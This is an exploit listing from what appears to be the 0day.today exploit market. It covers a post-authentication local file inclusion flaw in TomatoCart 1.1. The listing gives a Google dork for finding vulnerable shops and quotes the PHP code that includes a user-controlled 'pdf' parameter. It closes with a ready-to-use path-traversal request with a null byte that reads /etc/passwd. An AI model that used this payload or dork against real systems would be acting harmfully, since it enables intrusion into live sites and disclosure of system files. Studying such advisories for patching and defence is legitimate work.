[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TomatoCart 1.1 Post Auth Local File Inclusion Vulnerability

Author
brain[pillow]
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16924
Category
web applications
Date add
11-09-2011
Platform
php
# Exploit Title: TomatoCart 1.1 PostAuth Local File Include
# Google Dork: "Powered by TomatoCart"
# Date: 25.10.2010
# Author: brain[pillow]
# Software Link: http://www.tomatocart.com/
# Version: 1.1
 
=========================================================
# Vuln. code:
 
 if ($osC_Customer->isLoggedOn() === true) {
    
    if (isset($_REQUEST['module'])) {
      $module = $_REQUEST['module'];
      $osC_Language->load($module);
    } 
      
    if (isset($_REQUEST['pdf'])) {
      $pdf = $_REQUEST['pdf'];
    } 
      
    if (!empty($module) && !empty($pdf)) {
 
    
      if (file_exists('includes/modules/pdf/' . $pdf . '.php')) {
        include('includes/modules/pdf/' . $pdf . '.php');
          
        $pdf_class = 'toC_' .ucfirst($pdf) . '_PDF';
        $object = new $pdf_class();
        $object ->render();
          
        exit;
      }
    }
  }
 
=========================================================
# Exploit:
 
/pdf.php?module=1&pdf=../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2024-09-28]  #